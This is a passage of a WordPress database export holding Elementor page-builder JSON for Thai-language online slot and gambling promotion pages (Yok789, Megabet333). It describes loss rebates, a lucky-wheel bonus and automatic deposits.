\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 <b>YOK789<\\/b><\\/strong>\\u00a0\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><strong data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>YOK789<\\/b> \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2200,310,'_thumbnail_id','282'),(2219,293,'_wp_attachment_image_alt','3icon'),(2221,312,'_elementor_edit_mode','builder'),(2222,312,'_elementor_template_type','wp-page'),(2223,312,'_elementor_version','3.32.5'),(2224,312,'_elementor_pro_version','3.32.3'),(2225,312,'_wp_page_template','default'),(2226,312,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2227,312,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"355\\\" data-end=\\\"698\\\">\\u0e43\\u0e19\\u0e22\\u0e38\\u0e04\\u0e19\\u0e35\\u0e49 2025 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e22\\u0e38\\u0e04\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e40\\u0e25\\u0e22\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32 \\u0e22\\u0e38\\u0e04\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 megabet\\u00a0\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22\\u0e40\\u0e0a\\u0e48\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e17\\u0e22\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e34\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e08\\u0e32\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a Megabet333 \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e2a\\u0e25\\u0e34\\u0e1b\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e35\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e49\\u0e32\\u0e40\\u0e1a\\u0e17\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e19\\u0e33\\u0e14\\u0e49\\u0e32\\u0e19\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a API \\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33 100% \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e13\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e2d\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e41\\u0e2a\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e27\\u0e25\\u0e1c\\u0e25\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/3icon_-_Megabet333-Biz.webp\",\"id\":50,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e